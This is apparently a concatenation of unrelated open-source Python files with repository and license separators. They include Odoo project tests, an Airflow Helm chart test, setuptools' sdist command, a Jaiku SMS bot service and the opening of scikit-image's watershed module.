Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Hello,
This email should create a new entry in your module. Please check that it
effectively works.
Thanks,
--
Raoul Boitempoils
Integrator at Agrolait"""
class TestProjectFlow(TestProjectBase):
@mute_logger('openerp.addons.base.ir.ir_model', 'openerp.models')
def test_00_project_process(self):
""" Testing project management """
cr, uid, user_projectuser_id, user_projectmanager_id, project_pigs_id = self.cr, self.uid, self.user_projectuser_id, self.user_projectmanager_id, self.project_pigs_id
# ProjectUser: set project as template -> raise
self.assertRaises(AccessError, self.project_project.set_template, cr, user_projectuser_id, [project_pigs_id])
# Other tests are done using a ProjectManager
project = self.project_project.browse(cr, user_projectmanager_id, project_pigs_id)
self.assertNotEqual(project.state, 'template', 'project: incorrect state, should not be a template')
# Set test project as template
self.project_project.set_template(cr, user_projectmanager_id, [project_pigs_id])
project.refresh()
self.assertEqual(project.state, 'template', 'project: set_template: project state should be template')
self.assertEqual(len(project.tasks), 0, 'project: set_template: project tasks should have been set inactive')
# Duplicate template
new_template_act = self.project_project.duplicate_template(cr, user_projectmanager_id, [project_pigs_id])
new_project = self.project_project.browse(cr, user_projectmanager_id, new_template_act['res_id'])
self.assertEqual(new_project.state, 'open', 'project: incorrect duplicate_template')
self.assertEqual(len(new_project.tasks), 2, 'project: duplicating a project template should duplicate its tasks')
# Convert into real project
self.project_project.reset_project(cr, user_projectmanager_id, [project_pigs_id])
project.refresh()
self.assertEqual(project.state, 'open', 'project: resetted project should be in open state')
self.assertEqual(len(project.tasks), 2, 'project: reset_project: project tasks should have been set active')
# Put as pending
self.project_project.set_pending(cr, user_projectmanager_id, [project_pigs_id])
project.refresh()
self.assertEqual(project.state, 'pending', 'project: should be in pending state')
# Re-open
self.project_project.set_open(cr, user_projectmanager_id, [project_pigs_id])
project.refresh()
self.assertEqual(project.state, 'open', 'project: reopened project should be in open state')
# Close project
self.project_project.set_done(cr, user_projectmanager_id, [project_pigs_id])
project.refresh()
self.assertEqual(project.state, 'close', 'project: closed project should be in close state')
# Re-open
self.project_project.set_open(cr, user_projectmanager_id, [project_pigs_id])
project.refresh()
# Re-convert into a template and schedule tasks
self.project_project.set_template(cr, user_projectmanager_id, [project_pigs_id])
self.project_project.schedule_tasks(cr, user_projectmanager_id, [project_pigs_id])
# Copy the project
new_project_id = self.project_project.copy(cr, user_projectmanager_id, project_pigs_id)
new_project = self.project_project.browse(cr, user_projectmanager_id, new_project_id)
self.assertEqual(len(new_project.tasks), 2, 'project: copied project should have copied task')
# Cancel the project
self.project_project.set_cancel(cr, user_projectmanager_id, [project_pigs_id])
self.assertEqual(project.state, 'cancelled', 'project: cancelled project should be in cancel state')
def test_10_task_process(self):
""" Testing task creation and management """
cr, uid, user_projectuser_id, user_projectmanager_id, project_pigs_id = self.cr, self.uid, self.user_projectuser_id, self.user_projectmanager_id, self.project_pigs_id
def format_and_process(template, email_to='[email protected], [email protected]', subject='Frogs',
email_from='Patrick Ratatouille <[email protected]>',
msg_id='<[email protected]>'):
self.assertEqual(self.project_task.search(cr, uid, [('name', '=', subject)]), [])
mail = template.format(email_to=email_to, subject=subject, email_from=email_from, msg_id=msg_id)
self.mail_thread.message_process(cr, uid, None, mail)
return self.project_task.search(cr, uid, [('name', '=', subject)])
# Do: incoming mail from an unknown partner on an alias creates a new task 'Frogs'
frogs = format_and_process(EMAIL_TPL)
# Test: one task created by mailgateway administrator
self.assertEqual(len(frogs), 1, 'project: message_process: a new project.task should have been created')
task = self.project_task.browse(cr, user_projectuser_id, frogs[0])
res = self.project_task.get_metadata(cr, uid, [task.id])[0].get('create_uid') or [None]
self.assertEqual(res[0], uid,
'project: message_process: task should have been created by uid as alias_user_id is False on the alias')
# Test: messages
self.assertEqual(len(task.message_ids), 3,
'project: message_process: newly created task should have 2 messages: creation and email')
self.assertEqual(task.message_ids[2].subtype_id.name, 'Task Created',
'project: message_process: first message of new task should have Task Created subtype')
self.assertEqual(task.message_ids[1].subtype_id.name, 'Task Assigned',
'project: message_process: first message of new task should have Task Created subtype')
self.assertEqual(task.message_ids[0].author_id.id, self.email_partner_id,
'project: message_process: second message should be the one from Agrolait (partner failed)')
self.assertEqual(task.message_ids[0].subject, 'Frogs',
'project: message_process: second message should be the one from Agrolait (subject failed)')
# Test: task content
self.assertEqual(task.name, 'Frogs', 'project_task: name should be the email subject')
self.assertEqual(task.project_id.id, self.project_pigs_id, 'project_task: incorrect project')
self.assertEqual(task.stage_id.sequence, 1, 'project_task: should have a stage with sequence=1')
# Open the delegation wizard
delegate_id = self.project_task_delegate.create(cr, user_projectuser_id, {
'user_id': user_projectuser_id,
'planned_hours': 12.0,
'planned_hours_me': 2.0,
}, {'active_id': task.id})
self.project_task_delegate.delegate(cr, user_projectuser_id, [delegate_id], {'active_id': task.id})
# Check delegation details
task.refresh()
self.assertEqual(task.planned_hours, 2, 'project_task_delegate: planned hours is not correct after delegation')
| agpl-3.0 |
DinoCow/airflow | chart/tests/test_basic_helm_chart.py | 2 | 5185 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import unittest
from typing import Any, Dict, List, Union
import jmespath
from tests.helm_template_generator import render_chart
OBJECT_COUNT_IN_BASIC_DEPLOYMENT = 24
class TestBaseChartTest(unittest.TestCase):
def test_basic_deployments(self):
k8s_objects = render_chart(
"TEST-BASIC",
values={
"chart": {
'metadata': 'AA',
},
'labels': {"TEST-LABEL": "TEST-VALUE"},
},
)
list_of_kind_names_tuples = [
(k8s_object['kind'], k8s_object['metadata']['name']) for k8s_object in k8s_objects
]
self.assertEqual(
list_of_kind_names_tuples,
[
('ServiceAccount', 'TEST-BASIC-scheduler'),
('ServiceAccount', 'TEST-BASIC-webserver'),
('ServiceAccount', 'TEST-BASIC-worker'),
('Secret', 'TEST-BASIC-postgresql'),
('Secret', 'TEST-BASIC-airflow-metadata'),
('Secret', 'TEST-BASIC-airflow-result-backend'),
('ConfigMap', 'TEST-BASIC-airflow-config'),
('Role', 'TEST-BASIC-pod-launcher-role'),
('Role', 'TEST-BASIC-pod-log-reader-role'),
('RoleBinding', 'TEST-BASIC-pod-launcher-rolebinding'),
('RoleBinding', 'TEST-BASIC-pod-log-reader-rolebinding'),
('Service', 'TEST-BASIC-postgresql-headless'),
('Service', 'TEST-BASIC-postgresql'),
('Service', 'TEST-BASIC-statsd'),
('Service', 'TEST-BASIC-webserver'),
('Deployment', 'TEST-BASIC-scheduler'),
('Deployment', 'TEST-BASIC-statsd'),
('Deployment', 'TEST-BASIC-webserver'),
('StatefulSet', 'TEST-BASIC-postgresql'),
('Secret', 'TEST-BASIC-fernet-key'),
('Secret', 'TEST-BASIC-redis-password'),
('Secret', 'TEST-BASIC-broker-url'),
('Job', 'TEST-BASIC-create-user'),
('Job', 'TEST-BASIC-run-airflow-migrations'),
],
)
self.assertEqual(OBJECT_COUNT_IN_BASIC_DEPLOYMENT, len(k8s_objects))
for k8s_object in k8s_objects:
labels = jmespath.search('metadata.labels', k8s_object) or {}
            if 'postgresql' in labels.get('chart', ''):
continue
k8s_name = k8s_object['kind'] + ":" + k8s_object['metadata']['name']
self.assertEqual(
'TEST-VALUE',
labels.get("TEST-LABEL"),
f"Missing label TEST-LABEL on {k8s_name}. Current labels: {labels}",
)
def test_basic_deployment_without_default_users(self):
k8s_objects = render_chart("TEST-BASIC", {"webserver": {'defaultUser': {'enabled': False}}})
list_of_kind_names_tuples = [
(k8s_object['kind'], k8s_object['metadata']['name']) for k8s_object in k8s_objects
]
self.assertNotIn(('Job', 'TEST-BASIC-create-user'), list_of_kind_names_tuples)
self.assertEqual(OBJECT_COUNT_IN_BASIC_DEPLOYMENT - 1, len(k8s_objects))
def test_chart_is_consistent_with_official_airflow_image(self):
def get_k8s_objs_with_image(obj: Union[List[Any], Dict[str, Any]]) -> List[Dict[str, Any]]:
"""
Recursive helper to retrieve all the k8s objects that have an "image" key
inside k8s obj or list of k8s obj
"""
out = []
if isinstance(obj, list):
for item in obj:
out += get_k8s_objs_with_image(item)
if isinstance(obj, dict):
if "image" in obj:
out += [obj]
# include sub objs, just in case
for val in obj.values():
out += get_k8s_objs_with_image(val)
return out
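        # e.g. (illustrative): get_k8s_objs_with_image(
        #     [{"image": "a"}, {"spec": {"image": "b"}}]) returns both
        # dicts, because nested values are searched recursively.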
image_repo = "test-airflow-repo/airflow"
k8s_objects = render_chart("TEST-BASIC", {"defaultAirflowRepository": image_repo})
objs_with_image = get_k8s_objs_with_image(k8s_objects)
for obj in objs_with_image:
image: str = obj["image"] # pylint: disable=invalid-sequence-index
if image.startswith(image_repo):
# Make sure that a command is not specified
self.assertNotIn("command", obj)
| apache-2.0 |
kailIII/emaresa | trunk.cl/l10n_cl_partner_emaresa/l10n_cl_partner_emaresa.py | 3 | 1991 | # -*- coding: utf-8 -*-
##############################################################################
#
# Author: OpenDrive Ltda
# Copyright (c) 2013 Opendrive Ltda
#
# WARNING: This program as such is intended to be used by professional
# programmers who take the whole responsibility of assessing all potential
# consequences resulting from its eventual inadequacies and bugs
# End users who are looking for a ready-to-use solution with commercial
# guarantees and support are strongly advised to contract a Free Software
# Service Company
#
# This program is Free Software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
##############################################################################
import netsvc
import pooler
from osv import osv
from osv import fields
class res_partner(osv.osv):
# _name = 'res.partner'
_inherit = 'res.partner'
_columns = {
# 'ruc': fields.char('RUC', size=30),
'sucursal': fields.char('Sucursal', size=30),
'roi_type' : fields.selection([('dni','DNI o LE'),('ruc','RUC'),('carm', 'Carnet Militar'), ('care', 'Carnet de Extranjeria')], 'ROI tipo'),
'date_credit': fields.date('Vigencia Linea de Credito', required=False),
}
_sql_constraints = [
('sucursal_uniq', 'unique (sucursal)', 'La Sucursal Existe en el Sistema -- Favor verificar sus datos ingresados!'),
]
res_partner()
| agpl-3.0 |
liyi193328/seq2seq | seq2seq/contrib/learn/dataframe/transforms/example_parser.py | 26 | 2407 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A Transform that parses serialized tensorflow.Example protos."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
from tensorflow.contrib.learn.python.learn.dataframe import transform
from tensorflow.python.ops import parsing_ops
class ExampleParser(transform.TensorFlowTransform):
"""A Transform that parses serialized `tensorflow.Example` protos."""
def __init__(self, features):
"""Initialize `ExampleParser`.
The `features` argument must be an object that can be converted to an
`OrderedDict`. The keys should be strings and will be used to name the
output. Values should be either `VarLenFeature` or `FixedLenFeature`. If
`features` is a dict, it will be sorted by key.
Args:
features: An object that can be converted to an `OrderedDict` mapping
column names to feature definitions.
"""
super(ExampleParser, self).__init__()
if isinstance(features, dict):
self._ordered_features = collections.OrderedDict(sorted(features.items(
), key=lambda f: f[0]))
else:
self._ordered_features = collections.OrderedDict(features)
@property
def name(self):
return "ExampleParser"
@property
def input_valency(self):
return 1
@property
def _output_names(self):
return list(self._ordered_features.keys())
@transform._parameter # pylint: disable=protected-access
def feature_definitions(self):
return self._ordered_features
def _apply_transform(self, input_tensors, **kwargs):
parsed_values = parsing_ops.parse_example(input_tensors[0],
features=self._ordered_features)
# pylint: disable=not-callable
return self.return_type(**parsed_values)
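# Hypothetical usage sketch (feature names and dtypes are assumptions, not
# part of this module):
#
#   import tensorflow as tf
#   parser = ExampleParser(features={
#       "age": tf.FixedLenFeature([], tf.int64),
#       "tags": tf.VarLenFeature(tf.string),
#   })
#   # the parser's output columns would be ["age", "tags"], sorted by key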
| apache-2.0 |
ian-garrett/meetMe | env/lib/python3.4/site-packages/setuptools/command/sdist.py | 385 | 7079 | from glob import glob
from distutils import log
import distutils.command.sdist as orig
import os
import sys
from setuptools.compat import PY3
from setuptools.utils import cs_path_exists
import pkg_resources
READMES = 'README', 'README.rst', 'README.txt'
_default_revctrl = list
def walk_revctrl(dirname=''):
"""Find all files under revision control"""
for ep in pkg_resources.iter_entry_points('setuptools.file_finders'):
for item in ep.load()(dirname):
yield item
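# Plugins register finders through the 'setuptools.file_finders' entry
# point, e.g. in a plugin's setup.py (names are illustrative):
#
#   entry_points={
#       'setuptools.file_finders': [
#           'myvcs = myvcs_plugin:find_files',
#       ],
#   }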
class sdist(orig.sdist):
"""Smart sdist that finds anything supported by revision control"""
user_options = [
('formats=', None,
"formats for source distribution (comma-separated list)"),
('keep-temp', 'k',
"keep the distribution tree around after creating " +
"archive file(s)"),
('dist-dir=', 'd',
"directory to put the source distribution archive(s) in "
"[default: dist]"),
]
negative_opt = {}
def run(self):
self.run_command('egg_info')
ei_cmd = self.get_finalized_command('egg_info')
self.filelist = ei_cmd.filelist
self.filelist.append(os.path.join(ei_cmd.egg_info, 'SOURCES.txt'))
self.check_readme()
# Run sub commands
for cmd_name in self.get_sub_commands():
self.run_command(cmd_name)
# Call check_metadata only if no 'check' command
# (distutils <= 2.6)
import distutils.command
if 'check' not in distutils.command.__all__:
self.check_metadata()
self.make_distribution()
dist_files = getattr(self.distribution, 'dist_files', [])
for file in self.archive_files:
data = ('sdist', '', file)
if data not in dist_files:
dist_files.append(data)
def __read_template_hack(self):
# This grody hack closes the template file (MANIFEST.in) if an
# exception occurs during read_template.
# Doing so prevents an error when easy_install attempts to delete the
# file.
try:
orig.sdist.read_template(self)
except:
_, _, tb = sys.exc_info()
tb.tb_next.tb_frame.f_locals['template'].close()
raise
# Beginning with Python 2.7.2, 3.1.4, and 3.2.1, this leaky file handle
# has been fixed, so only override the method if we're using an earlier
# Python.
has_leaky_handle = (
sys.version_info < (2, 7, 2)
or (3, 0) <= sys.version_info < (3, 1, 4)
or (3, 2) <= sys.version_info < (3, 2, 1)
)
if has_leaky_handle:
read_template = __read_template_hack
def add_defaults(self):
standards = [READMES,
self.distribution.script_name]
for fn in standards:
if isinstance(fn, tuple):
alts = fn
got_it = 0
for fn in alts:
if cs_path_exists(fn):
got_it = 1
self.filelist.append(fn)
break
if not got_it:
self.warn("standard file not found: should have one of " +
', '.join(alts))
else:
if cs_path_exists(fn):
self.filelist.append(fn)
else:
self.warn("standard file '%s' not found" % fn)
optional = ['test/test*.py', 'setup.cfg']
for pattern in optional:
files = list(filter(cs_path_exists, glob(pattern)))
if files:
self.filelist.extend(files)
# getting python files
if self.distribution.has_pure_modules():
build_py = self.get_finalized_command('build_py')
self.filelist.extend(build_py.get_source_files())
# This functionality is incompatible with include_package_data, and
# will in fact create an infinite recursion if include_package_data
# is True. Use of include_package_data will imply that
# distutils-style automatic handling of package_data is disabled
if not self.distribution.include_package_data:
for _, src_dir, _, filenames in build_py.data_files:
self.filelist.extend([os.path.join(src_dir, filename)
for filename in filenames])
if self.distribution.has_ext_modules():
build_ext = self.get_finalized_command('build_ext')
self.filelist.extend(build_ext.get_source_files())
if self.distribution.has_c_libraries():
build_clib = self.get_finalized_command('build_clib')
self.filelist.extend(build_clib.get_source_files())
if self.distribution.has_scripts():
build_scripts = self.get_finalized_command('build_scripts')
self.filelist.extend(build_scripts.get_source_files())
def check_readme(self):
for f in READMES:
if os.path.exists(f):
return
else:
self.warn(
"standard file not found: should have one of " +
', '.join(READMES)
)
def make_release_tree(self, base_dir, files):
orig.sdist.make_release_tree(self, base_dir, files)
# Save any egg_info command line options used to create this sdist
dest = os.path.join(base_dir, 'setup.cfg')
if hasattr(os, 'link') and os.path.exists(dest):
# unlink and re-copy, since it might be hard-linked, and
# we don't want to change the source version
os.unlink(dest)
self.copy_file('setup.cfg', dest)
self.get_finalized_command('egg_info').save_version_info(dest)
def _manifest_is_not_generated(self):
# check for special comment used in 2.7.1 and higher
if not os.path.isfile(self.manifest):
return False
        # 'rb' rather than the historical 'rbU': the 'U' flag is a no-op in
        # binary mode and was removed outright in newer Pythons. Stripping the
        # line also keeps the comparison independent of line-ending style.
        fp = open(self.manifest, 'rb')
        try:
            first_line = fp.readline()
        finally:
            fp.close()
        return (first_line.strip() !=
                '# file GENERATED by distutils, do NOT edit'.encode())
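    # Illustrative example of what the check above distinguishes: a manifest
    # generated by distutils 2.7.1 and higher begins with the marker comment,
    #
    #   # file GENERATED by distutils, do NOT edit
    #   setup.py
    #   README.txt
    #
    # while a hand-maintained MANIFEST lacks that first line, so the method
    # returns True.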
def read_manifest(self):
"""Read the manifest file (named by 'self.manifest') and use it to
fill in 'self.filelist', the list of files to include in the source
distribution.
"""
log.info("reading manifest file '%s'", self.manifest)
        manifest = open(self.manifest, 'rb')
for line in manifest:
# The manifest must contain UTF-8. See #303.
if PY3:
try:
line = line.decode('UTF-8')
except UnicodeDecodeError:
log.warn("%r not UTF-8 decodable -- skipping" % line)
continue
# ignore comments and blank lines
line = line.strip()
if line.startswith('#') or not line:
continue
self.filelist.append(line)
manifest.close()
| artistic-2.0 |
ridhoillyasa/jaikuengine | common/sms.py | 34 | 10152 | import logging
import re
from django.conf import settings
from common import api
from common import clean
from common import exception
from common import patterns
from common import user
from common import util
from common.protocol import base
from common.protocol import sms
HELP_HUH = "Sorry, did not understand \"%s\". Send HELP for commands"
HELP_WELCOME = "Welcome to %s SMS! Questions? Contact support@%s" % (settings.SITE_NAME, settings.NS_DOMAIN)
HELP_WELCOME_NICK = "Welcome to %s SMS %s! Questions? Contact support@%s" % (settings.SITE_NAME, '%s', settings.NS_DOMAIN)
HELP_DOUBLE_OPT_IN = "To confirm you'd like to receive SMS updates, reply YES. You'll only have to do this once."
HELP_SIGNED_OUT = "You have signed out."
HELP_CHARGES = "%s is free. Other charges may apply." % (settings.SITE_NAME)
HELP_HELP_1 = "%s SMS updates. To get alerts text FOLLOW user/channelname. To stop text LEAVE user/channelname. To stop all alerts text STOP. To resume text START" % (settings.SITE_NAME)
HELP_HELP_2 = "Complete list on %s/sms. Other charges may apply. Questions? Contact support@%s" % (settings.DOMAIN, settings.NS_DOMAIN)
HELP_NOT_SIGNED_IN = "You are currently signed out\n"
HELP_SIGNED_IN_AS = "You are signed in as '%s'\n"
HELP_FOLLOW_ONLY = "You are signed in as a follow-only user\n"
HELP_PASSWORD = "Your password is: %s\n" \
"Use it to sign in on the web at http://%s/\n" % ('%s', settings.DOMAIN)
HELP_POST = "To post to your stream, just send a message"
HELP_CHANNEL_POST = "To post to a channel, start your message with " \
"#channel"
HELP_COMMENT = "To comment on the latest update from someone, start " \
"with @user"
HELP_FOLLOW = "To follow a user or channel, send FOLLOW <user/#channel>"
HELP_FOLLOW_NEW = "Send FOLLOW <user/#channel> to just follow a user or " \
"channel without signing up"
HELP_LEAVE = "To stop following a user or channel, send LEAVE <user/#channel>"
HELP_STOP = "To stop all alerts, send OFF"
HELP_START = "To turn on alerts, send ON"
HELP_SIGN_OUT = "To sign out from %s SMS, send SIGN OUT" % (settings.SITE_NAME)
HELP_DELETE_ME = "To remove your %s account, send DELETE ME" % (settings.SITE_NAME)
HELP_SIGN_IN = "Send SIGN IN <screen name> <password> if you already have a " \
"%s account" % (settings.SITE_NAME)
HELP_SIGN_UP = "Send SIGN UP <desired screen name> to create a new account"
HELP_MORE = "For more commands, type HELP"
HELP_FOOTER = "\n" \
"Questions? Visit http://%s/help/im\n" \
"Contact us at support@%s" % (settings.DOMAIN, settings.NS_DOMAIN)
HELP_FOOTER_INFORMAL = "\n" \
"How it all works: http://%s/help/im" % (settings.DOMAIN)
HELP_OTR = "Your IM client has tried to initiate an OTR (off-the-record) session. However, this bot does not support OTR."
HELP_START_NOTIFICATIONS = "SMS notifications have been enabled. Send OFF to stop, HELP for commands."
HELP_STOP_NOTIFICATIONS = "SMS notifications have been disabled. Send ON to start receiving again."
class SmsService(base.Service):
handlers = [patterns.SignInHandler,
patterns.SignOutHandler,
patterns.PromotionHandler,
patterns.HelpHandler,
patterns.CommentHandler,
patterns.OnHandler,
patterns.OffHandler,
patterns.ChannelPostHandler,
patterns.FollowHandler,
patterns.LeaveHandler,
patterns.ConfirmHandler,
patterns.PostHandler,
]
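  # The handlers above are presumably tried in order, with the first matching
  # pattern routing the inbound text to the corresponding method below. A
  # self-contained sketch of that dispatch style (not the actual
  # common.patterns implementation):
  #
  #   import re
  #
  #   DISPATCH = [
  #       (re.compile(r'^SIGN IN (\S+) (\S+)$', re.I), 'sign_in'),
  #       (re.compile(r'^FOLLOW (\S+)$', re.I), 'actor_add_contact'),
  #       (re.compile(r'^#(\S+)\s+(.+)$'), 'channel_post'),
  #   ]
  #
  #   def route(service, sender, message):
  #       for pattern, method_name in DISPATCH:
  #           match = pattern.match(message)
  #           if match:
  #               return getattr(service, method_name)(sender, *match.groups())
  #       return service.unknown(sender, message)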
# TODO(termie): the following should probably be part of some sort of
# service interface, it is almost an exact duplicate of
# ImService
def response_ok(self, rv=None):
return ""
def response_error(self, exc):
return str(exc)
def channel_join(self, sender, nick):
sender_ref = api.actor_lookup_mobile(api.ROOT, sender)
if not sender_ref:
raise exception.ValidationError(HELP_SIGN_IN)
channel = clean.channel(nick)
try:
api.channel_join(sender_ref, sender_ref.nick, channel)
self.send_message((sender,),
"%s joined %s" % (sender_ref.display_nick(), nick))
except:
self.send_message((sender,),
"Failed to join %s" % nick)
def channel_part(self, sender, nick):
sender_ref = api.actor_lookup_mobile(api.ROOT, sender)
if not sender_ref:
raise exception.ValidationError(HELP_SIGN_IN)
channel = clean.channel(nick)
try:
api.channel_part(sender_ref, sender_ref.nick, channel)
self.send_message((sender,),
"%s left %s" % (sender_ref.display_nick(), nick))
except:
self.send_message((sender,),
"Failed to leave %s" % nick)
def confirm(self, sender):
""" confirm something if something needs to be confirmed
otherwise, just post the message
"""
sender_ref = api.actor_lookup_mobile(api.ROOT, sender)
if not sender_ref:
raise exception.ValidationError(HELP_SIGN_IN)
if sender_ref.extra.get('sms_double_opt_in', None):
api.mobile_confirm_doubleoptin(api.ROOT, sender_ref.nick)
self.start_notifications(sender)
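  # Double opt-in flow, pieced together from confirm() above and
  # start_notifications() below: while 'sms_double_opt_in' is set on the
  # actor, start_notifications() only sends the HELP_DOUBLE_OPT_IN prompt;
  # replying YES routes here via ConfirmHandler, which (presumably) clears
  # the flag through mobile_confirm_doubleoptin and then enables alerts.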
def actor_add_contact(self, sender, nick):
sender_ref = api.actor_lookup_mobile(api.ROOT, sender)
if not sender_ref:
raise exception.ValidationError(HELP_SIGN_IN)
clean_nick = clean.nick(nick)
try:
api.actor_add_contact(sender_ref, sender_ref.nick, clean_nick)
self.send_message((sender,),
"%s followed %s" % (sender_ref.display_nick(), nick))
except:
self.send_message((sender,),
"Failed to follow %s" % nick)
def actor_remove_contact(self, sender, nick):
sender_ref = api.actor_lookup_mobile(api.ROOT, sender)
if not sender_ref:
raise exception.ValidationError(HELP_SIGN_IN)
clean_nick = clean.nick(nick)
try:
api.actor_remove_contact(sender_ref, sender_ref.nick, clean_nick)
self.send_message((sender,),
"%s stopped following %s" % (sender_ref.dispaly_nick(),
nick))
except:
self.send_message((sender,),
"Failed to stop following %s" % nick)
def send_message(self, to_list, message):
self.connection.send_message(to_list, message)
def unknown(self, sender, message):
self.send_message([sender], HELP_HUH % message)
def sign_in(self, sender, nick, password):
sender_ref = api.actor_lookup_mobile(api.ROOT, sender)
if sender_ref:
raise exception.ValidationError(
"You are already signed in, please SIGN OUT first")
user_ref = user.authenticate_user_login(nick, password)
if not user_ref:
raise exception.ValidationError("Username or password is incorrect")
mobile_ref = api.mobile_associate(api.ROOT, user_ref.nick, sender)
# if they need to double opt in send them the confirmation message
welcome = ' '.join([HELP_WELCOME_NICK % user_ref.display_nick(),
HELP_POST,
HELP_START,
HELP_CHARGES
])
self.send_message([sender], welcome)
def sign_out(self, sender):
sender_ref = api.actor_lookup_mobile(api.ROOT, sender)
if not sender_ref:
raise exception.ValidationError(HELP_SIGN_IN)
mobile_ref = api.mobile_disassociate(api.ROOT, sender_ref.nick, sender)
self.send_message([sender], HELP_SIGNED_OUT)
def help(self, sender):
welcome = ' '.join([HELP_HELP_1,
HELP_HELP_2,
])
self.send_message([sender], welcome)
def start_notifications(self, sender):
sender_ref = api.actor_lookup_mobile(api.ROOT, sender)
if not sender_ref:
raise exception.ValidationError(HELP_SIGN_IN)
if sender_ref.extra.get('sms_double_opt_in', None):
message = ' '.join([HELP_DOUBLE_OPT_IN,
HELP_CHARGES])
self.send_message([sender], message)
return
actor_ref = api.settings_change_notify(api.ROOT, sender_ref.nick, sms=True)
message = ' '.join([HELP_START_NOTIFICATIONS,
HELP_CHARGES])
self.send_message([sender], message)
def stop_notifications(self, sender):
sender_ref = api.actor_lookup_mobile(api.ROOT, sender)
if not sender_ref:
raise exception.ValidationError(HELP_SIGN_IN)
actor_ref = api.settings_change_notify(api.ROOT, sender_ref.nick, sms=False)
self.send_message([sender], HELP_STOP_NOTIFICATIONS)
def post(self, sender, message):
sender_ref = api.actor_lookup_mobile(api.ROOT, sender)
if not sender_ref:
raise exception.ValidationError(HELP_SIGN_IN)
entry_ref = api.post(sender_ref, nick=sender_ref.nick, message=message)
def channel_post(self, sender, channel_nick, message):
sender_ref = api.actor_lookup_mobile(api.ROOT, sender)
if not sender_ref:
raise exception.ValidationError(HELP_SIGN_IN)
comment_ref = api.channel_post(
sender_ref,
message=message,
nick=sender_ref.nick,
channel=channel_nick
)
def add_comment(self, sender, nick, message):
sender_ref = api.actor_lookup_mobile(api.ROOT, sender)
if not sender_ref:
raise exception.ValidationError(HELP_SIGN_IN)
logging.debug("comment: %s %s %s", nick, sender_ref.nick, message)
nick = clean.nick(nick)
stream_entry = api.reply_get_cache(sender=nick,
target=sender_ref.nick,
service='sms')
if not stream_entry:
# Well, or memcache timed it out... Or we crashed... Or... Or...
raise exception.ValidationError(
'The message to which you tried to respond doesn\'t exist')
api.entry_add_comment(sender_ref, entry=stream_entry.keyname(),
content=message, nick=sender_ref.nick,
stream=stream_entry.stream)
| apache-2.0 |
bsipocz/scikit-image | skimage/morphology/watershed.py | 29 | 13277 | """watershed.py - watershed algorithm
This module implements a watershed algorithm that apportions pixels into
marked basins. The algorithm uses a priority queue to hold the pixels
with the metric for the priority queue being pixel value, then the time
of entry into the queue - this settles ties in favor of the closest marker.
Some ideas taken from
Soille, "Automated Basin Delineation from Digital Elevation Models Using
Mathematical Morphology", Signal Processing 20 (1990) 171-182.
The most important insight in the paper is that entry time onto the queue
solves two problems: a pixel should be assigned to the neighbor with the
largest gradient or, if there is no gradient, pixels on a plateau should
be split between markers on opposite sides.
Originally part of CellProfiler, code licensed under both GPL and BSD licenses.
Website: http://www.cellprofiler.org
Copyright (c) 2003-2009 Massachusetts Institute of Technology
Copyright (c) 2009-2011 Broad Institute
All rights reserved.
Original author: Lee Kamentsky
"""
from heapq import heappush, heappop
import numpy as np
from scipy import ndimage as ndi
from ..filters import rank_order
from . import _watershed
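# The ordering rule described in the module docstring -- pixel value first,
# then time of entry -- is exactly lexicographic comparison of tuples on a
# heap. A tiny self-contained illustration, independent of the C extension:
#
#   from heapq import heappush, heappop
#
#   pq = []
#   heappush(pq, (5, 1))  # value 5, queued second
#   heappush(pq, (5, 0))  # value 5, queued first
#   heappush(pq, (3, 2))  # lower value wins regardless of age
#   assert heappop(pq) == (3, 2)
#   assert heappop(pq) == (5, 0)  # tie broken in favor of earlier entry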
def watershed(image, markers, connectivity=None, offset=None, mask=None):
"""
Return a matrix labeled using the watershed segmentation algorithm
Parameters
----------
image: ndarray (2-D, 3-D, ...) of integers
Data array where the lowest value points are labeled first.
markers: ndarray of the same shape as `image`
An array marking the basins with the values to be assigned in the
label matrix. Zero means not a marker. This array should be of an
integer type.
connectivity: ndarray, optional
An array with the same number of dimensions as `image` whose
non-zero elements indicate neighbors for connection.
Following the scipy convention, default is a one-connected array of
the dimension of the image.
offset: array_like of shape image.ndim, optional
offset of the connectivity (one offset per dimension)
mask: ndarray of bools or 0s and 1s, optional
Array of same shape as `image`. Only points at which mask == True
will be labeled.
Returns
-------
out: ndarray
A labeled matrix of the same type and shape as markers
See also
--------
skimage.segmentation.random_walker: random walker segmentation
A segmentation algorithm based on anisotropic diffusion, usually
slower than the watershed but with good results on noisy data and
boundaries with holes.
Notes
-----
    This function implements a watershed algorithm [1]_ that apportions pixels
into marked basins. The algorithm uses a priority queue to hold the pixels
with the metric for the priority queue being pixel value, then the time of
entry into the queue - this settles ties in favor of the closest marker.
Some ideas taken from
Soille, "Automated Basin Delineation from Digital Elevation Models Using
Mathematical Morphology", Signal Processing 20 (1990) 171-182
The most important insight in the paper is that entry time onto the queue
solves two problems: a pixel should be assigned to the neighbor with the
largest gradient or, if there is no gradient, pixels on a plateau should
be split between markers on opposite sides.
This implementation converts all arguments to specific, lowest common
denominator types, then passes these to a C algorithm.
